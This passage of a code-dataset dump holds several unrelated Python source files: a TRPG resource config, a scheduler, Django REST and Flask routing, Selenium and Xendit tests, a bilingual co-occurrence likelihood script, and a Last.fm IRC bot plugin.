main()\n","sub_path":"Lesson01/week_01_08_task_2.py","file_name":"week_01_08_task_2.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"142461299","text":"from . import helper\nfrom trpgcreator import config\n\n\nclass ResourceInfo:\n def __init__(self, name, folder, ext, default, create=True, subfolder=True, delete=True):\n self.name = name\n self.folder = folder\n self.ext = ext\n self.default = default\n self.create = create\n self.subfolder = subfolder\n self.delete = delete\n\n\n# \nability = ResourceInfo('ability', 'Abilities', '.abil',\n {})\n\nbuff = ResourceInfo('buff', 'Buffs', '.buff',\n {})\n\nenemy = ResourceInfo('enemy', 'Enemies', '.enem',\n {})\n\nfunction = ResourceInfo('function', 'Functions', '.func',\n '')\n\nitem = ResourceInfo('item', 'Items', '.item',\n {\n 'name': '',\n 'desc': '',\n 'value': 0,\n 'use': '',\n 'equip': None\n })\n\nperk = ResourceInfo('perk', 'Perks', '.perk',\n {})\n\nres_stat = ResourceInfo('resource stat', 'Stats-Resource', '.reso',\n {\n 'name': '',\n 'desc': ''\n },\n subfolder=False)\n\nother_stat = ResourceInfo('other stat', 'Stats-Other', '.othr',\n {\n 'name': '',\n 'desc': ''\n },\n subfolder=False)\n\nhealth_stat = ResourceInfo('health stat', 'Stats-Health', '.hlth',\n {\n 'name': 'Health',\n 'desc': 'Health is what keeps you alive.'\n },\n create=False, delete=False, subfolder=False)\n\nscenario = ResourceInfo('scenario', 'Scenarios', '.scen',\n {\n 'name': '',\n 'desc': '',\n 'options': []\n })\n\nshop = ResourceInfo('shop', 'Shops', '.shop',\n {})\n\nall_info = [\n # ability,\n # buff,\n # enemy,\n function,\n item,\n # perk,\n res_stat,\n other_stat,\n health_stat,\n scenario,\n # shop\n]\n# \n\nfolders = list(map(lambda r: r.folder, all_info))\n\n# Yes, this is ugly. But it's the easiest way to convert from available data to other needed data.\next_to_name = {resource.ext: resource.name for resource in all_info}\nfolder_to_name = {resource.folder: resource.name for resource in all_info}\nfolder_to_ext = {resource.folder: resource.ext for resource in all_info}\nname_to_default = {resource.name: resource.default for resource in all_info}\nfolder_to_object = {resource.folder: resource for resource in all_info}\next_to_object = {resource.ext: resource for resource in all_info}\n\n\ndef create_config_files(directory, campaign_name):\n # /.settings\n settings_dir = directory + '/.settings'\n player_data = {\n 'scenario': 'start',\n 'stats': {\n 'health': {},\n 'resource': {},\n 'other': {}\n },\n 'inventory': {\n 'currency': 0,\n 'items': {}\n }\n }\n export_data = {\n 'name': campaign_name,\n 'creator': config.get('default_creator'),\n 'about': ''\n }\n helper.save_json_data(settings_dir + '/std/player.json', player_data)\n helper.save_json_data(settings_dir + '/debug/player.json', player_data)\n helper.save_json_data(settings_dir + '/std/globals.json', {})\n helper.save_json_data(settings_dir + '/debug/globals.json', {})\n helper.save_json_data(settings_dir + '/export.json', export_data)\n","sub_path":"trpgcreator/misc/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"617872203","text":"import datetime\nimport re\nfrom time import gmtime, strftime\nfrom threading import Timer\nfrom datetime import datetime, timedelta\n\n\nclass Scheduler:\n\n rgx = None\n settings = None\n db_config = None\n task_settings = None\n task = None\n\n def __init__(self, config):\n\n self.settings = config['MAIN']\n self.db_config = config['DATABASE']\n\n self.rgx = re.compile(r\"^0\", re.IGNORECASE)\n\n # convert interval from minutes to seconds, and delete first 0 fom start_time\n self.task_settings = {\n \"interval\": int(self.settings['interval']) * 60,\n \"start_time\": int(re.sub(self.rgx, \"\", self.settings['start_time']))\n }\n\n if self.settings.getboolean('debug'):\n print(\"Interval: %s\" % self.task_settings['interval'])\n\n if self.task_settings['start_time'] == 0:\n self.task_settings['start_time'] = 60\n\n if self.settings.getboolean('debug'):\n print(\"Start time: %s\" % self.task_settings['start_time'])\n\n def start(self):\n if self.task is not None:\n self.task.start()\n\n def test(self):\n\n print(strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\n self.create()\n\n def create(self, task):\n\n current_timestamp = datetime.today()\n\n if self.settings.getboolean('debug'):\n print(\"Current Time: %s\" % current_timestamp)\n\n schedule_time = current_timestamp.replace(second=0, microsecond=0)\n\n minutes = self.task_settings['start_time'] - schedule_time.minute % self.task_settings['start_time']\n\n if minutes == 0:\n minutes = self.task_settings['start_time']\n\n schedule_time = schedule_time + timedelta(minutes=minutes)\n\n if self.settings.getboolean('debug'):\n print(\"Schedule Time: %s\" % schedule_time)\n\n delta_t = schedule_time - current_timestamp\n delay = delta_t.seconds + 1\n\n if self.settings.getboolean('debug'):\n print(\"Time delta: %s\" % delay)\n\n self.task = Timer(delay, task, [self])\n\n\n","sub_path":"classes/Scheduler.py","file_name":"Scheduler.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"562627486","text":"from django.urls import include, path\nfrom rest_framework import routers\nfrom . import views\nfrom .views import StudentViewSet,UserViewSet,ProfessorViewSet,AdminViewSet,CourseViewSet,SectionViewSet,AnnouncementViewSet,AssignmentViewSet,EnrollmentViewSet,StudentAssignmentViewSet\nfrom rest_framework import renderers\n\n\n\n\n\n#Binding ViewSets to URLs explicitly\n\nstudent_list = StudentViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\nstudent_detail = StudentViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\nprofessor_list =ProfessorViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\nprofessor_detail =ProfessorViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\n\nstudent_highlight =StudentViewSet.as_view({\n 'get': 'highlight'\n}, renderer_classes=[renderers.StaticHTMLRenderer])\n\nprofessor_highlight =ProfessorViewSet.as_view({\n 'get': 'highlight'\n}, renderer_classes=[renderers.StaticHTMLRenderer])\n\nadmin_list =AdminViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\nadmin_detail = AdminViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\nadmin_highlight = AdminViewSet.as_view({\n 'get': 'highlight'\n}, renderer_classes=[renderers.StaticHTMLRenderer])\n\ncourse_list =CourseViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\ncourse_detail =CourseViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\ncourse_highlight =CourseViewSet.as_view({\n 'get': 'highlight'\n}, renderer_classes=[renderers.StaticHTMLRenderer])\n\n\n\nsection_list =SectionViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\nsection_detail = SectionViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\nsection_highlight =SectionViewSet.as_view({\n 'get': 'highlight'\n},\n renderer_classes=[renderers.StaticHTMLRenderer])\n\n\n\n\nannouncement_list =AnnouncementViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\nannouncement_detail =AnnouncementViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\nannouncement_highlight =AnnouncementViewSet.as_view({\n 'get': 'highlight'\n},\n renderer_classes=[renderers.StaticHTMLRenderer])\n\n\n\n\n\n\nassignment_list =AssignmentViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\nassignment_detail =AssignmentViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\nassignment_highlight =AssignmentViewSet.as_view({\n 'get': 'highlight'\n},\n renderer_classes=[renderers.StaticHTMLRenderer])\n\n\n\nenrollment_list =EnrollmentViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\nenrollment_detail =EnrollmentViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\nenrollment_highlight =EnrollmentViewSet.as_view({\n 'get': 'highlight'\n},\n renderer_classes=[renderers.StaticHTMLRenderer])\n\n\n\n\nassignment_list =AssignmentViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\nassignment_detail =AssignmentViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\nassignment_highlight =AssignmentViewSet.as_view({\n 'get': 'highlight'\n},\n renderer_classes=[renderers.StaticHTMLRenderer])\n\n\n\nstudentAssignment_list =StudentAssignmentViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\nstudentAssignment_detail =StudentAssignmentViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\nstudentAssignment_highlight =StudentAssignmentViewSet.as_view({\n 'get': 'highlight'\n},\n renderer_classes=[renderers.StaticHTMLRenderer])\n\n\n\n\n\nuser_list = UserViewSet.as_view({\n 'get': 'list'\n})\nuser_detail = UserViewSet.as_view({\n 'get': 'retrieve'\n})\n\n\n# Routers provide an easy way of automatically determining the URL conf\n# Create a router and register our viewsets with it.\n\nrouter = routers.DefaultRouter()\n\n\nrouter.register(r'admin', views.AdminViewSet)\n\nrouter.register(r'users', views.UserViewSet)\n\n\nrouter.register(r'groups', views.GroupViewSet)\n\n\nrouter.register(r'student', views.StudentViewSet)\n\nrouter.register(r'professor', views.ProfessorViewSet)\n\n\n\nrouter.register(r'course', views.CourseViewSet)\n\nrouter.register(r'section', views.SectionViewSet)\n\nrouter.register(r'announcement', views.AnnouncementViewSet)\n\nrouter.register(r'assignment', views.AssignmentViewSet)\n\nrouter.register(r'enrollment', views.EnrollmentViewSet)\n\nrouter.register(r'studentAssignment', views.StudentAssignmentViewSet)\n\n\n\n\n# Wire up our API using automatic URL routing.\n# Additionally, we include login URLs for the browsable API.\n# register the views with the URL conf as usual.\n# The API URLs are now determined automatically by the router\nurlpatterns = [\n\n path('', include(router.urls)),\n\n path('students/', student_list, name='student-list'),\n\n path('students//', student_detail, name='student-detail'),\n \n path('professors/', professor_list, name='professor-list'),\n\n path('professors//', professor_detail, name='professor-detail'),\n\n \n path('admin/', admin_list, name='user-list'),\n\n path('admin//', admin_detail, name='user-detail'),\n\n\n path('course/', course_list, name='user-list'),\n\n path('course//', course_detail, name='user-detail'),\n\n\n path('section/', section_list, name='user-list'),\n\n path('section//', section_detail, name='user-detail'),\n\n\n path('announcement/', announcement_list, name='user-list'),\n\n path('announcement//', announcement_detail, name='user-detail'),\n\n\n path('assignment/', assignment_list, name='user-list'),\n\n path('assignment//', assignment_detail, name='user-detail'),\n\n\n path('enrollment/',enrollment_list, name='user-list'),\n\n path('enrollment//', enrollment_detail, name='user-detail'),\n\n\n\n path('studentAssignment/',studentAssignment_list, name='user-list'),\n\n path('studentAssignment//', studentAssignment_detail, name='user-detail'),\n\n\n path('users/', user_list, name='user-list'),\n\n path('users//', user_detail, name='user-detail'),\n\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework'))\n]","sub_path":"cms_project/cmsApi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"43723135","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf.urls.static import static # new\nfrom django.conf import settings # new\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/posts/', include('apps.post.urls')),\n path('api/channels/', include('apps.channel.urls')),\n path('api/auth/', include('apps.user.urls')),\n path('', include('rest_framework.urls')),\n path('api/feed/', include('apps.home.urls')),\n path('api/notification/', include('apps.notification.urls')),\n]\n\nif settings.DEBUG: # new\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n","sub_path":"backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"240254784","text":"from flask import Flask, request, jsonify, abort\nfrom flask_cors import CORS\nfrom datetime import datetime\nfrom emoji_feedback import EmojiFeedbackSensor\n\napp = Flask(__name__)\nCORS(app)\n\n# faking actor, edApp, and session\nactor = {\n 'id': 'urn:uuid:1a02e4fc-24c1-11e9-ab14-d663bd873d93',\n 'type': 'Person',\n 'name': 'First Last',\n 'dateCreated': datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z'\n}\n\nedApp = {\n 'id': \"urn:uuid:3a02e4fc-24c1-11e9-ab14-d663bd873d93\",\n 'type': 'SoftwareApplication'\n}\n\nsession = {\n 'id': \"urn:uuid:4a02e4fc-24c1-11e9-ab14-d663bd873d93\",\n 'type': 'Session'\n}\n\n@app.route('/')\ndef hello():\n return 'Hello, World!'\n\n@app.route('/emoji', methods=['POST'])\ndef emoji():\n req_data = request.get_json()\n object = req_data.get('object')\n eventTime = req_data.get('eventTime')\n selections = req_data.get('selections')\n question = req_data.get('question')\n\n feedback_sensor = EmojiFeedbackSensor(debug=True)\n feedback_sensor.send_emoji_feedback(\n eventTime=eventTime,\n actor=actor,\n object=object,\n edApp=edApp,\n session=session,\n question=question,\n selections=selections\n )\n\n resp = jsonify(success=True)\n return resp\n\n@app.route('/feedback', methods=['POST'])\ndef feedback():\n req_data = request.get_json()\n object = req_data.get('object')\n eventTime = req_data.get('eventTime')\n feedback = req_data.get('feedback')\n questionText = req_data.get('questionText')\n\n feedback_sensor = EmojiFeedbackSensor(debug=True)\n feedback_sensor.send_comment_feedback(\n eventTime=eventTime,\n actor=actor,\n object=object,\n edApp=edApp,\n session=session,\n questionText=questionText,\n commentText=feedback\n )\n\n resp = jsonify(success=True)\n return resp\n\n# @app.route('/votes', methods=['GET'])\n# def votes():\n# return jsonify({'votes': 2715})\n\nif __name__ == \"__main__\":\n import sys\n import logging\n logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)\n app.run(host=\"0.0.0.0\", debug=True)","sub_path":"example/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"185044172","text":"# -*- coding: utf-8 -*-\n\"\"\"ExRed Footer Page Object.\"\"\"\nimport logging\n\nfrom selenium import webdriver\n\nfrom utils import assertion_msg, selenium_action, take_screenshot\n\nNAME = \"ExRed Footer\"\nURL = None\n\nSECTIONS = {\n \"export readiness\": {\n \"label\": \"#footer-links-2\",\n \"new\": \"#footer-links-2 ~ ul > li:nth-child(1) > a\",\n \"occasional\": \"#footer-links-2 ~ ul > li:nth-child(2) > a\",\n \"regular\": \"#footer-links-2 ~ ul > li:nth-child(3) > a\",\n \"i'm new to exporting\": \"#footer-links-2 ~ ul > li:nth-child(1) > a\",\n \"i export occasionally\": \"#footer-links-2 ~ ul > li:nth-child(2) > a\",\n \"i'm a regular exporter\": \"#footer-links-2 ~ ul > li:nth-child(3) > a\"\n },\n \"guidance\": {\n \"label\": \"#footer-links-3\",\n \"market research\": \"#footer-links-3 ~ ul a[href='/market-research']\",\n \"customer insight\": \"#footer-links-3 ~ ul a[href='/customer-insight']\",\n \"finance\": \"#footer-links-3 ~ ul a[href='/finance']\",\n \"business planning\": \"#footer-links-3 ~ ul a[href='/business-planning']\",\n \"getting paid\": \"#footer-links-3 ~ ul a[href='/getting-paid']\",\n \"operations and compliance\": \"#footer-links-3 ~ ul a[href='/operations-and-compliance']\"\n },\n \"services\": {\n \"label\": \"#footer-links-4\",\n \"export opportunities\": \"#footer-links-4 ~ ul > li:nth-child(1) > a\",\n \"selling online overseas\": \"#footer-links-4 ~ ul > li:nth-child(2) > a\",\n \"find a buyer\": \"#footer-links-4 ~ ul > li:nth-child(3) > a\",\n \"get finance\": \"#footer-links-4 ~ ul > li:nth-child(4) > a\",\n \"events\": \"#footer-links-4 ~ ul > li:nth-child(5) > a\"\n },\n \"general links\": {\n \"part of great.gov.uk\": \"#footer > .site-links > ul > li:nth-child(1) > a\",\n \"about\": \"#footer > .site-links > ul > li:nth-child(2) > a\",\n \"contact us\": \"#footer > .site-links > ul > li:nth-child(3) > a\",\n \"privacy and cookies\": \"#footer > .site-links > ul > li:nth-child(4) > a\",\n \"terms and conditions\": \"#footer > .site-links > ul > li:nth-child(5) > a\",\n \"department for international trade\": \"#footer > .site-links > ul > li:nth-child(6) > a\"\n }\n}\n\n\ndef should_see_all_menus(driver: webdriver):\n for section in SECTIONS:\n for name, selector in SECTIONS[section].items():\n logging.debug(\n \"Looking for '%s' link in '%s' section with '%s' selector\",\n name, section, selector)\n with selenium_action(\n driver, \"Could not find '%s link' using '%s'\",\n name, selector):\n element = driver.find_element_by_css_selector(selector)\n with assertion_msg(\n \"It looks like '%s' in '%s' section is not visible\",\n name, section):\n assert element.is_displayed()\n logging.debug(\"All elements in '%s' section are visible\", section)\n logging.debug(\n \"All expected sections on %s are visible\", NAME)\n\n\ndef open(driver: webdriver, group: str, element: str):\n link = SECTIONS[group.lower()][element.lower()]\n button = driver.find_element_by_css_selector(link)\n assert button.is_displayed()\n button.click()\n take_screenshot(\n driver, NAME + \" after clicking on: %s link\".format(element))\n","sub_path":"tests/exred/pages/footer.py","file_name":"footer.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"420708400","text":"import pytest\nfrom ..model_base_test import ModelBaseTest\nfrom tests.sampleresponse.direct_debit import payment_method_response\nfrom xendit.models import DirectDebit, DirectDebitPaymentMethodType\n\n\n# fmt: off\nclass TestCreatePaymentMethod(ModelBaseTest):\n @pytest.fixture\n def default_payment_method_data(self):\n tested_class = DirectDebit\n class_name = \"DirectDebit\"\n method_name = \"create_payment_method\"\n http_method_name = \"post\"\n properties = DirectDebit.helper_create_payment_method_properties(\n id='la-fac7e744-ab40-4100-a447-cbbb16f29ded',\n )\n args = ()\n kwargs = {\n \"customer_id\": \"ed20b5db-df04-41fc-8018-8ea4ac4d1030\",\n \"type\": DirectDebitPaymentMethodType.DEBIT_CARD,\n \"properties\": properties,\n }\n params = (args, kwargs)\n url = \"/payment_methods\"\n expected_correct_result = payment_method_response()\n return (tested_class, class_name, method_name, http_method_name, url, params, expected_correct_result)\n\n @pytest.fixture\n def api_requestor_request_data(self, default_payment_method_data):\n tested_class, class_name, method_name, http_method_name, url, params, _ = default_payment_method_data\n headers = {}\n body = {\n \"customer_id\": \"ed20b5db-df04-41fc-8018-8ea4ac4d1030\",\n \"type\": \"DEBIT_CARD\",\n \"properties\": {\n 'id': 'la-fac7e744-ab40-4100-a447-cbbb16f29ded'\n },\n }\n return (tested_class, class_name, method_name, http_method_name, url, params, headers, body)\n\n @pytest.mark.parametrize(\"mock_correct_response\", [payment_method_response()], indirect=True)\n def test_return_payment_method_on_correct_params(\n self, mocker, mock_correct_response, default_payment_method_data\n ):\n self.run_success_return_test_on_xendit_instance(mocker, mock_correct_response, default_payment_method_data)\n\n def test_raise_xendit_error_on_response_error(\n self, mocker, mock_error_request_response, default_payment_method_data\n ):\n self.run_raises_error_test_on_xendit_instance(mocker, mock_error_request_response, default_payment_method_data)\n\n @pytest.mark.parametrize(\"mock_correct_response\", [payment_method_response()], indirect=True)\n def test_return_payment_method_on_correct_params_and_global_xendit(\n self, mocker, mock_correct_response, default_payment_method_data\n ):\n self.run_success_return_test_on_global_config(mocker, mock_correct_response, default_payment_method_data)\n\n def test_raise_xendit_error_on_response_error_and_global_xendit(\n self, mocker, mock_error_request_response, default_payment_method_data\n ):\n self.run_raises_error_test_on_global_config(mocker, mock_error_request_response, default_payment_method_data)\n\n @pytest.mark.parametrize(\"mock_correct_response\", [payment_method_response()], indirect=True)\n def test_send_correct_request_to_api_requestor(self, mocker, mock_correct_response, api_requestor_request_data):\n self.run_send_correct_request_to_api_requestor(mocker, mock_correct_response, api_requestor_request_data)\n# fmt: on\n","sub_path":"tests/unit/models/directdebit/test_create_payment_method.py","file_name":"test_create_payment_method.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"292035120","text":"# -*- coding: utf-8 -*-\nfrom io import StringIO\nfrom collections import Counter\nimport math\n\ndef count_sentences_with_word_long(f):\n cnt = Counter() \n for l in f:\n words_set = set(l.split())\n cnt.update(words_set)\n return cnt\n \ndef build_cooc_table(f1, f2):\n lines_src = f1.readlines()\n\n lines_tgt = f2.readlines()\n r = dict()\n for i in range(len(lines_src)):\n words_set_src = set(lines_src[i].split())\n words_set_tgt = set(lines_tgt[i].split())\n for w_src in words_set_src:\n for w_tgt in words_set_tgt:\n key = (w_src, w_tgt)\n if key in r:\n r[key]+=1\n else:\n r[key]=1 \n\n return r\n \n\ndef pair_likelihood(f1, f2, fr_w, en_w):\n pair = (fr_w, en_w)\n \n n_a = fr_oc_table.get(fr_w)\n \n p_a = n_a/N\n \n n_b = en_oc_table.get(en_w)\n p_b = n_b/N\n \n n_not_a = N - n_a\n p_na = n_not_a/N\n \n n_not_b = N - n_b\n p_nb = n_not_b/N\n \n n_a_and_b = cooc_table.get(pair)\n p_n_a_and_b = n_a_and_b/N\n \n n_not_a_and_b = N - n_a + n_a_and_b\n p_n_not_a_and_b = n_not_a_and_b/N\n\n n_a_and_not_b = N - n_b + n_a_and_b\n p_n_a_and_not_b = n_a_and_not_b/N\n \n n_not_a_and_not_b = N - n_a - n_b + n_a_and_b\n p_n_not_a_and_not_b = n_not_a_and_not_b/N\n \n r = p_n_not_a_and_not_b * math.log(p_n_not_a_and_not_b/(p_na*p_nb), 2)\n\n r+= p_n_not_a_and_b * math.log(p_n_not_a_and_b/(p_na*p_b), 2)\n \n r+= p_n_a_and_not_b * math.log(p_n_a_and_not_b/ (p_a * p_nb), 2)\n r+= p_n_a_and_b * math.log(p_n_a_and_b /(p_a*p_b), 2)\n \n r*= 2 * N\n \n return r\n \n \n\nf1 = open(\"french.corpus\", 'r')\nf2 = open(\"english.corpus\", 'r')\nfr_oc_table = count_sentences_with_word_long(f1)\nen_oc_table = count_sentences_with_word_long(f2)\nf1 = open(\"french.corpus\", 'r')\nf2 = open(\"english.corpus\", 'r')\ncooc_table = build_cooc_table(f1,f2)\nf1 = open(\"french.corpus\", 'r')\nN = len(f1.readlines())\n\n\nprint(pair_likelihood(f1,f2, \"dans\", \"the\"))","sub_path":"intro_appr/TP1/lexicon_extraction.py","file_name":"lexicon_extraction.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"168147357","text":"\"\"\"\nLast.fm now playing and music comparisons.\n\nAllow users to display their now playing status and compare music tastes using\nLast.fm.\n\"\"\"\n\nimport requests\nimport gzip\nimport humanize\nfrom datetime import datetime\nfrom lxml import etree\n\nfrom kochira import config\nfrom kochira.userdata import UserData\nfrom kochira.service import Service, background, Config, coroutine\n\nservice = Service(__name__, __doc__)\n\n@service.config\nclass Config(Config):\n api_key = config.Field(doc=\"Last.fm API key.\")\n\n\ndef query_lastfm(api_key, method, arguments):\n params = arguments.copy()\n params.update({\n \"method\": method,\n \"api_key\": api_key\n })\n\n r = requests.get(\n \"http://ws.audioscrobbler.com/2.0/\",\n params=params,\n stream=True\n )\n\n return etree.parse(gzip.GzipFile(fileobj=r.raw))\n\n\ndef get_compare_users(api_key, user1, user2):\n res = query_lastfm(\n api_key,\n \"tasteometer.compare\",\n {\n \"type1\": \"user\",\n \"type2\": \"user\",\n \"value1\": user1,\n \"value2\": user2\n }\n )\n\n comparison = res.xpath(\"/lfm[@status='ok']/comparison/result\")\n\n if comparison:\n comparison, = comparison\n\n score, = comparison.xpath(\"score/text()\")\n artists = comparison.xpath(\"artists/artist/name/text()\")\n\n return {\n \"user1\": user1,\n \"user2\": user2,\n \"score\": float(score),\n \"artists\": artists\n }\n\n return None\n\n\ndef get_user_now_playing(api_key, user):\n res = query_lastfm(\n api_key,\n \"user.getRecentTracks\",\n {\n \"user\": user,\n \"limit\": 1\n }\n )\n\n track = res.xpath(\"/lfm[@status='ok']/recenttracks/track[@nowplaying='true']\")\n\n now_playing = True\n\n if not track:\n track = res.xpath(\"/lfm[@status='ok']/recenttracks/track\")\n now_playing = False\n\n if track:\n track = track[0]\n\n artist, = track.xpath(\"artist/text()\")\n name, = track.xpath(\"name/text()\")\n album, = track.xpath(\"album/text()\") or [None]\n ts, = track.xpath(\"date/@uts\") or [None]\n\n ts = int(ts) if ts is not None else None\n\n # get track info\n track_tags_r = query_lastfm(\n api_key,\n \"track.getTopTags\", {\n \"artist\": artist,\n \"track\": name\n }\n )\n tags = track_tags_r.xpath(\"/lfm[@status='ok']/toptags/tag/name/text()\")\n\n track_info_r = query_lastfm(\n api_key,\n \"track.getInfo\", {\n \"username\": user,\n \"artist\": artist,\n \"track\": name\n }\n )\n info = track_info_r.xpath(\"/lfm[@status='ok']/track\")\n\n if info:\n info, = info\n\n user_playcount, = info.xpath(\"userplaycount/text()\") or [0]\n user_playcount = int(user_playcount)\n\n user_loved, = info.xpath(\"userloved/text()\") or [0]\n user_loved = int(user_loved)\n else:\n user_playcount = 0\n user_loved = 0\n\n return {\n \"user\": user,\n \"artist\": artist,\n \"name\": name,\n \"album\": album,\n \"tags\": tags,\n \"ts\": ts,\n \"user_playcount\": user_playcount,\n \"user_loved\": user_loved,\n \"now_playing\": now_playing\n }\n\n return None\n\n\n@coroutine\ndef get_lfm_username(client, who):\n user_data = yield UserData.lookup_default(client, who)\n return user_data.get(\"lastfm_user\", who)\n\n\n@service.command(r\"!lfm (?P\\S+)$\")\n@service.command(r\"my last\\.fm username is (?P\\S+)$\", mention=True)\n@coroutine\ndef setup_user(ctx, lfm_username):\n \"\"\"\n Set username.\n\n Associate a Last.fm username with your nickname.\n \"\"\"\n\n try:\n user_data = yield UserData.lookup(ctx.client, ctx.origin)\n except UserData.DoesNotExist:\n ctx.respond(ctx._(\"You must be logged in to set your Last.fm username.\"))\n return\n\n user_data[\"lastfm_user\"] = lfm_username\n user_data.save()\n\n ctx.respond(ctx._(\"You have been associated with the Last.fm username {user}.\").format(user=lfm_username))\n\n\n@service.command(r\"!lfm$\")\n@service.command(r\"what is my last\\.fm username\\??$\", mention=True)\n@coroutine\ndef check_user(ctx):\n \"\"\"\n Now playing.\n\n Get the currently playing song for a user.\n \"\"\"\n\n try:\n user_data = yield UserData.lookup(ctx.client, ctx.origin)\n except UserData.DoesNotExist:\n ctx.respond(ctx._(\"You must be logged in to set your Last.fm username.\"))\n return\n\n if \"lastfm_user\" not in user_data:\n ctx.respond(ctx._(\"You don't have a Last.fm username associated with your nickname. Please use \\\"!lfm\\\" to associate one.\"))\n return\n\n ctx.respond(ctx._(\"Your nickname is associated with {user}.\").format(user=user_data[\"lastfm_user\"]))\n\n\n@service.command(r\"!tasteometer (?P\\S+) (?P\\S+)$\")\n@service.command(r\"!tasteometer (?P\\S+)$\")\n@service.command(r\"compare my last\\.fm with (?P\\S+)$\", mention=True)\n@service.command(r\"compare (?P\\S+) and (?P\\S+) on last\\.fms$\", mention=True)\n@background\n@coroutine\ndef compare_users(ctx, user2, user1=None):\n \"\"\"\n Tasteometer.\n\n Compare the music tastes of two users.\n \"\"\"\n if user1 is None:\n user1 = ctx.origin\n\n lfm1 = yield ctx.bot.defer_from_thread(get_lfm_username, ctx.client, user1)\n lfm2 = yield ctx.bot.defer_from_thread(get_lfm_username, ctx.client, user2)\n\n comparison = get_compare_users(ctx.config.api_key, lfm1, lfm2)\n\n if comparison is None:\n ctx.respond(ctx._(\"Couldn't compare.\"))\n return\n\n ctx.respond(ctx._(\"{user1} ({lfm1}) and {user2} ({lfm2}) are {score:.2%} similar: {artists}\").format(\n user1=user1,\n lfm1=lfm1,\n user2=user2,\n lfm2=lfm2,\n score=comparison[\"score\"],\n artists=\", \".join(comparison[\"artists\"])\n ))\n\n\n@service.command(r\"!np$\")\n@service.command(r\"!np (?P\\S+)$\")\n@service.command(r\"what am i playing\\??$\", mention=True)\n@service.command(r\"what is (?P\\S+) playing\\??$\", mention=True)\n@background\n@coroutine\ndef now_playing(ctx, who=None):\n \"\"\"\n Get username.\n\n Get your Last.fm username.\n \"\"\"\n if who is None:\n who = ctx.origin\n\n lfm = yield get_lfm_username(ctx.client, who)\n track = get_user_now_playing(ctx.config.api_key, lfm)\n\n if track is None:\n ctx.respond(ctx._(\"{who} ({lfm}) has never scrobbled anything.\").format(\n who=who,\n lfm=lfm\n ))\n return\n\n track_descr = ctx._(\"{artist} - {name}{album}{tags} (played {playcount} time{s})\").format(\n name=track[\"name\"],\n artist=track[\"artist\"],\n album=(\" - \" + track[\"album\"]) if track[\"album\"] else \"\",\n tags=(\" (\" + \", \".join(track[\"tags\"][:5]) + \")\") if track[\"tags\"] else \"\",\n playcount=track[\"user_playcount\"],\n s=\"s\" if track[\"user_playcount\"] != 1 else \"\",\n )\n\n if not track[\"now_playing\"]:\n ctx.respond(ctx._(\"{who} ({lfm}) was playing about {dt}: {descr}\").format(\n who=who,\n lfm=lfm,\n dt=humanize.naturaltime(datetime.fromtimestamp(track[\"ts\"])),\n descr=track_descr\n ))\n else:\n ctx.respond(ctx._(\"{who} ({lfm}) is playing: {descr}\").format(\n who=who,\n lfm=lfm,\n descr=track_descr\n 